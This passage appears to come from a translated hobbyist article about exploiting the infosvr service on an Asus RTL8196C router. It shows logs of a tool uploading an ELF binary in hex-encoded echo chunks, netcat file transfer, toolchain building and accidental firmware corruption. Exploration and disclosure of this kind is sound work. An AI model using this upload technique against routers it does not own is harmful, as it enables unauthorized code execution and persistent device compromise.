83.5% 139.5 Bps part 175 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.0% 145.9 Bps part 176 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.4% 145.9 Bps part 177 (48 B; cmd: 235 ch) 192.168.1.1 : OK
84.9% 142.0 Bps part 178 (48 B; cmd: 235 ch) 192.168.1.1: OK
85.4% 150.5 Bps part 179 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
85.9% 150.0 Bps part 180 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
86.3% 142.0 Bps part 181 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
86.8% 143.7 Bps part 182 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
87.3% 147.7 Bps part 183 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
87.8% 141.6 Bps part 184 (48 B; cmd: 235 ch) LOST
87.8% 32.0 Bps part 184 (48 B; cmd: 235 ch) 192.168.1.1: OK
88.2% 355.6 Bps part 185 (48 B; cmd: 235 ch ) ש 192.168.1.1: OK
88.7% 149.1 Bps part 186 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
89.2% 140.4 Bps part 187 (48 B; cmd: 235 ch) ש 192.168.1.1 : OK
89.7% 147.2 Bps part 188 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
90.1% 148.1 Bps part 189 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
90.6% 144.1 Bps part 190 (48 B; cmd: 235 ch) LOST
90.6% 32.0 Bps part 190 (48 B; cmd: 235 ch) 192.168.1.1: OK
91.1% 406.8 Bps part 191 (48 B; cmd: 235 ch) 192.168.1.1 : OK
91.6% 142.9 Bps part 192 (48 B; cmd: 235 ch) 192.168.1.1: OK
92.0% 148.1 Bps part 193 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
92.5% 144.6 Bps part 194 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
93.0% 147.2 Bps part 195 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
93.5% 144.1 Bps part 196 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
94.0% 147.7 Bps part 197 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
94.4% 145.9 Bps part 198 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
94.9% 174.5 Bps part 199 (48 B; cmd: 235 ch) 192.168.1.1 : OK
95.4% 123.4 Bps part 200 (48 B; cmd: 237 ch) 192.168.1.1: OK
Merging to / var / ldd parts 101..116 (16 pcs; cmd: 229 ch) ... OK (5586 B)
Merging to / var / ldd parts 117..132 (16 pcs; cmd: 238 ch) ... OK (6354 B)
Merging to / var / ldd parts 133..148 (16 pcs; cmd: 238 ch) ... OK (7122 B)
Merging to / var / ldd parts 149..164 (16 pcs; cmd: 238 ch) ... OK (7890 B)
Merging to / var / ldd parts 165..180 (16 pcs; cmd: 238 ch) ... OK (8658 B)
Merging to / var / ldd parts 181..196 (16 pcs; cmd: 238 ch) ... OK (9426 B)
Merging to / var / ldd parts 197..200 (4 pcs; cmd: 71 ch) ... OK (9618 B)
Written 9.39KB / 9.85KB 92.9 Bps (avg) Remaining: 00:05 (01: 54/01: 59)

95.9% 4.9 Bps part 201 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.4 % 146.7 Bps part 202 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.8% 155.6 Bps part 203 (49 B; cmd: 237 ch) שש 192.168.1.1: OK
97.3% 142.9 Bps part 204 (49 B ; cmd: 237 ch) 192.168.1.1: OK
97.8% 153.1 Bps part 205 (49 B; cmd: 237 ch) LOST
97.8% 32.7 Bps part 205 (49 B; cmd: 237 ch) 192.168.1.1: OK
98.3% 388.9 Bps part 206 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
98.8% 148.5 Bps part 207 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.3% 144.5 Bps part 208 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.8% 151.2 Bps part 209 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
100.0% 75.3 Bps part 210 (25 B; cmd: 143 ch) שש 192 .168.1.1: OK
Merging to / var / ldd parts 201..210 (10 pcs; cmd: 145 ch) ... OK (10084 B)
Written 9.85KB / 9.85KB 78.7 Bps (avg) Remaining: 00:00 (02 : 00/02: 00)

Finished. File size on target is 9.85KB. Working time: 02:00 (120 sec)

Note to the next spoiler
  • In place of /// *** such my comments *** /// lines were deleted so as not to overload the text.
  • And in place of /// --- such --- /// nothing was deleted. These are just explanations.

/dev/console (/dev/ttyS0) - обратите внимание на имя файла, в который перенаправляется вывод на разных этапах
system cmd: 237 echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28\x00">/var/ldd_0-1;cat /var/ldd_0-1
rund: echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28\x00">/var/ldd_0-1;cat /var/ldd_0-1 > /tmp/syscmd.out
49 ELF
system cmd: 237 echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2
rund: echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2 > /tmp/syscmd.out
49

///*** много-много подобных строк — ПЕРЕДАЧА ЧАСТЕЙ ФАЙЛА ***///

system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100 > /tmp/syscmd.out
48
///--- Запрос размера целевого файла (для контроля успешности объединения частей) ---///
system cmd: 35 echo -n "">>/var/ldd;wc -c rund: echo -n "">>/var/ldd;wc -c /tmp/syscmd.out
2 0

///--- Объединение загруженных частей ---///
system cmd: 228 cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd;
rund: cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd; > /tmp/syscmd.out
0 0

///--- Запрос размера целевого файла (для контроля успешности объединения частей) ---///
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
4 777
ш $D
system cmd: 238 cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd;
rund: cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd; > /tmp/syscmd.out
0 777
ш $D
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
5 1545
ш $D

///*** много подобных строк — ОБЪЕДИНЕНИЕ ПЕРЕДАННЫХ ЧАСТЕЙ ФАЙЛА ***///

system cmd: 71 cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd;
rund: cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd; > /tmp/syscmd.out
0 4617
ш $D
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
5 4809
ш $D
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
5 4809
ш $D

///--- следующая команда удаляет уже объединённые части ---///
system cmd: 37 rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l
ls: /var/ldd_0-*: No such file or directory
rund: rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l > /tmp/syscmd.out
2 0
09
ш $D

///--- далее цикл повторяется для следующего куска (в исходниках называемого chunk-ом) исходного файла ---///

system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1 > /tmp/syscmd.out
49
system cmd: 237 echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2
rund: echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2 > /tmp/syscmd.out
49 X

///*** много-много-много строк — ПРОХОДИТ НЕСКОЛЬКО ЦИКЛОВ ***///

system cmd: 237 echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9
rund: echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9 > /tmp/syscmd.out
49
system cmd: 143 echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10
rund: echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10 > /tmp/syscmd.out
25
system cmd: 35 echo -n "">>/var/ldd;wc -c rund: echo -n "">>/var/ldd;wc -c /tmp/syscmd.out
5 9618

system cmd: 145 cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd;
rund: cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd; > /tmp/syscmd.out
0 9618

system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
6 10084

system cmd: 37 rm /var/ldd_2-*;ls /var/ldd_2-*|wc -l
ls: / var / ldd_2- *: No such file or directory
rund: rm / var / ldd_2 - *; ls / var / ldd_2- * | wc -l> /tmp/syscmd.out
2 0
084

system cmd: 35 echo -n "" >> / var / ldd; wc -c rund: echo -n "" >> / var / ldd; wc -c /tmp/syscmd.out
6 10084


So what's next?

As you know, in Linux, to run a file for execution, you need to set the appropriate permissions for it. The problem is that there was no chmod on the router (remember about the highly truncated busybox ?). But nothing. You can get around this:



Profit! We just uploaded our executable file to the router and it works! Although hey ... And where did we get it, this file?

How to get executable files for your router


First of all, you need to find out the CPU architecture of your router. The easy way does not provide all the necessary information:
# cat / proc / cpuinfo
system type: RTL8196C
processor: 0
cpu model: 52481
BogoMIPS: 389.12
tlb_entries: 32
mips16 implemented: yes
#

You can, of course, search the datasheet and find this information in it ... And if it is not available? And if there are different modifications? The surest way is to look at what is already working.

You will have to somehow get the executable from the router to analyze it using the file and readelf -h commands .

I did it like this:
  • launched telnetd and connected TeraTerm to it
  • configured TeraTerm to a log in a file with the binary option
  • TeraTerm no longer touch (so that nothing extra gets to the top of the log)
  • executed AsusCmd.exe "cat / bin / infosvr> / dev / ttyp0;"
  • stopped the log in the file

The resulting file came out a little more than what lies on the router (some garbage mixed in). But nothing: we are only interested in the beginning of the file - ELF Header.

Transfer the resulting file to a Linux machine. Now you can see the title:



Now everything is clear: MIPS-1, Big endian.

We collect a toolchain for our router

Here is my script memo (choose a configurator to your liking):
#!/bin/sh
wget http://buildroot.uclibc.org/downloads/buildroot-2014.11.tar.gz
tar zxf buildroot-2014.11.tar.gz
cd buildroot-2014.11
sudo apt-get -y install g++
# curses-based configurators
sudo apt-get -y install libncurses5-dev
make menuconfig # original curses-based configurator
#make nconfig # new curses-based configurator
# Qt-based configurator
#sudo apt-get -y install libqt4-dev
#make xconfig # Qt-based configurator
# GTK-based configurator
#sudo apt-get -y install libgtk2.0-dev libglade2-dev
#make gconfig # GTK-based configurator
make

At the step make * config, we configure the toolchain.

At the very least, you need to configure the target architecture. Target options ---> Target Architecture and Target Architecture Variant . There is a small catch: right away you will not find it in Target Architecture Variant Mips I. To make it appear there you need to enable the Build options ---> Show options and packages that are deprecated or obsolete option .

You can configure nothing else. And you can configure a lot of things: enable support for C ++ and other languages, static layout (I haven’t got anything good from this), choose applications compiled for the target architecture, appletsbusybox , library versions, etc.

After setting, select Exit , agree to save the new configuration and ... make . The assembly will take a long time, depending on what you select in the settings (When setting up the architecture of the target processor only, the assembly on VM Ware took a little more than half an hour. I measured it like this: ttt = `date`; make; echo $ ttt; date ). It is possible to collect in parallel, but not with -jN . The manual reads:
You should never use make -jN with Buildroot: top-level parallel make is currently not supported. Instead, use the BR2_JLEVEL option to tell Buildroot to run the compilation of each individual package with make -jN .
Those. you need to configure the Build options ---> Number of jobs to run simultaneously parameter .

Toolchain ready

Finally, after xx minutes, the toolchain gathered completely and without errors. Can be used. GCC for the router will be along the path ./buildroot-2014.11/output/host/usr/bin/mips-linux-gcc (symlink to mips-buildroot-linux-uclibc-gcc ).
To begin, we’ll write a primitive program, compile it, upload it to the router, set the execution permission (the trick shown earlier) and run it:



Now you can write your own programs for the router, taking into account the limited resources and the capabilities of the libraries that are on the router.

But along with the toolchain some binaries on the target platform also came together! They lie here: ./buildroot-2014.11/output/target/ bin | sbin | usr / bin | usr / sbin . I tried many of them (inmenuconfig configured the assembly of many additional applications). Those that turned out to be workers and seemed useful kept separately (maybe sometime needed).

Not all were workers. After downloading to the router, many refused to work for various reasons:
  • most often - can't load library 'some kind of library'
  • partially work - can't resolve symbol 'some symbol'
  • Segmentation fault - no comment
  • and all are statically linked - Illegal instruction

And if you have an error like Bus error or unexpected word , then most likely you made a mistake with the choice of the target architecture (or the file is corrupted).

Increase comfort

You probably noticed that the file transfer speed through the “hole” in infosvr , to put it mildly, leaves much to be desired. I wanted to solve this problem by writing TargetSideAgent , which would weigh a little and raise a full TCP connection. Already a bit of code has written how SUDDENLY I discovered the wonderful netcat utility ! This utility turned out to be working among the applications built by buildroot for the target platform. Now you don’t have to worry for a long time - netcat transfers files to the router (and from the router too) almost instantly! For fast transfer, you can now use this approach:
  • using AsusBinWrite, fill in the netcat router
  • set him permission to execute
  • run on reception:
    ./netcat -vvlp 8888> recvfile
  • and from the computer we start the transfer:
    ncat.exe -vv --send-only 192.168.1.1 8888 <Useful \ cpuload

By the way, if for some reason the file transfer using AsusBinWrite was interrupted, then you can resume it using the RESUME option :

Resuming an interrupted transfer



Now the speed is decent and you can easily download even "weighty" files. But don't get carried away. Do not forget that / var and / tmp (which is actually / var / tmp ) is the RAM of the router. If you completely kill her, the router will stop responding (or freeze altogether). In this case, you have to restart it manually. Control free memory with free .

By the way, when I was looking for netcat for Windows, I came across " 21st century netcat ." It is much richer in functionality than regular netcat . For our case, the - send-only option turned out to be very useful (break the connection immediately after the transfer).

What else can be done?


Посмотрите на это 'хозяйство':
# mount
rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
proc on /proc type proc (rw,relatime)
ramfs on /var type ramfs (rw,relatime)
#
# cat /proc/partitions
major minor #blocks name

31 0 64 mtdblock0
31 1 3211 mtdblock1
31 2 4032 mtdblock2
#
# cat /proc/mtd
dev: size erasesize name
mtd0: 00010000 00001000 «boot + cfg»
mtd1: 00322fee 00001000 «root fs»
mtd2: 003f0000 00001000 «linux + root fs»
#
# ls -lF /dev
crw-rw-rw- 1 root root 4, 64 Sep 18 20:22 console
lrwxrwxrwx 1 root root 8 Sep 18 12:05 log -> /tmp/log=
drwxrwxrwx 2 root root 3 Sep 18 12:03 misc/
brw-rw-rw- 1 root root 31, 0 Sep 18 12:05 mtdblock0
brw-rw-rw- 1 root root 31, 1 Sep 18 12:05 mtdblock1
brw-rw-rw- 1 root root 31, 2 Sep 18 12:05 mtdblock2
brw-rw-rw- 1 root root 31, 3 Sep 18 12:05 mtdblock3
crw-rw-rw- 1 root root 1, 3 Sep 18 12:05 null
crw-rw-rw- 1 root root 108, 0 Sep 18 12:05 ppp
crw-rw-rw- 1 root 5 5, 2 Sep 18 12:05 ptmx
drwxrwxrwx 2 root root 3 Sep 18 12:03 pts/
crw-rw-rw- 1 root root 2, 0 Sep 18 20:23 ptyp0
crw-rw-rw- 1 root root 2, 1 Sep 18 12:05 ptyp1
crw-rw-rw- 1 root root 4, 64 Sep 18 12:05 ttyS0
crw-rw-rw- 1 root root 4, 65 Sep 18 12:05 ttyS1
crw-rw-rw- 1 root root 3, 0 Sep 18 20:23 ttyp0
crw-rw-rw- 1 root root 3, 1 Sep 18 12:05 ttyp1
crw-rw-rw- 1 root root 1, 9 Sep 18 12:05 urandom
#


I somehow inadvertently redirected something to / dev / mtdblock2 . It is recorded. The router worked. Then, when I decided to reboot it, it did not boot. After seeing what is issued on UART, I realized that I still damaged the firmware. The router booted up in recovery mode (Asus Firmware Restoration utility works with this mode).

Recovery mode
========== SPI =============
SDRAM CLOCK:156MHZ
— Force into Single IO Mode —
|No chipID Sft chipSize blkSize secSize pageSize sdCk opCk chipName |
| 0 ef4016h 0h 400000h 10000h 1000h 100h 104 39 W25Q32|


---RealTek(RTL8196C)at 2012.04.09-16:54+0800 version v1.1f [16bit](390MHz)
no sys signature at 00010000!
Set 8196C PHY Patch OK

---Ethernet init Okay!

ps
Unknown command!

ls
Unknown command!

help
— COMMAND MODE HELP — HELP (?): Print this help message
D

DB

DW

EW

EB

CMP: CMP
IPCONFIG:
AUTOBURN: 0/1
LOADADDR:
J: Jump to
FLW : Write offset-data to SPI from RAM


Without thinking twice, I launched the same Firmware Restoration and restored the firmware.
Display of Asus Firmware Restoration Utility
D
File Start: 80500000, length = 0

** TFTP GET File ASUSSPACELINK1, Size 0 Byte

** filename: 31 13 FFFFFFFE FFFFFFA9 Byte
run ASUSSPACELINK

** TFTP Client Upload, File Name: ASUSSPACELINK

** TFTP Client Upload File Size = 278ABC Bytes at 80500000

Success!

Linux kernel (root-fs) upgrade.
checksum Ok!
burn Addr = 0x10000! srcAddr = 0x80500000 len = 0xcd012

#### head_offset: 0 (0x0), flash_burnAddr: 0x10000, is_firmware: 1

#### Start to burn ...
...
Flash Write Successed!

Root filesystem upgrade.
checksum Ok!
burn Addr = 0x100000! srcAddr = 0x805cd022 len = 0x1aba9a

#### head_offset: 839698 (0xcd012), flash_burnAddr: 0xdd012, is_firmware: 1

#### Start to burn ...
...
Flash Write Successed!

reboot .......


The very fact of damage to the firmware in a running router suggests that using the vulnerability you can change it. Then the changes on the router will be permanent, and not just before the reboot, as it was until now.
But I have neither the time nor the desire to study this.



AsusRouterTools sources as well as Windows binaries can be found in the repository on GitHub.

Z.Y. Since I figured out with infosvr , why not use it also for its intended purpose? AsusDiscover is the only thing that will continue to work after installing the firmware with the fixed vulnerability.

Console version of Device Discovery


PS This is my first publication, so I will be glad to any advice and comments both regarding the article and about the program code.

PPS A little bit of indignation: Habrahabr should add protection against accidental publication to the article writing interface. Somehow I pressed Enter - and the "Publish" button worked. You need to add either some kind of safety checkbox, or ask again before publication, or give the opportunity to immediately withdraw the sending for publication. Yes, and such a big one ... You can miss and poke it instead of the "Preview". Why is this not thought out?

UPD: Together with readers (@ a553), exploits fixed bugs leading to a crash when receiving a response from some routers. More details in this comment.

Also popular now: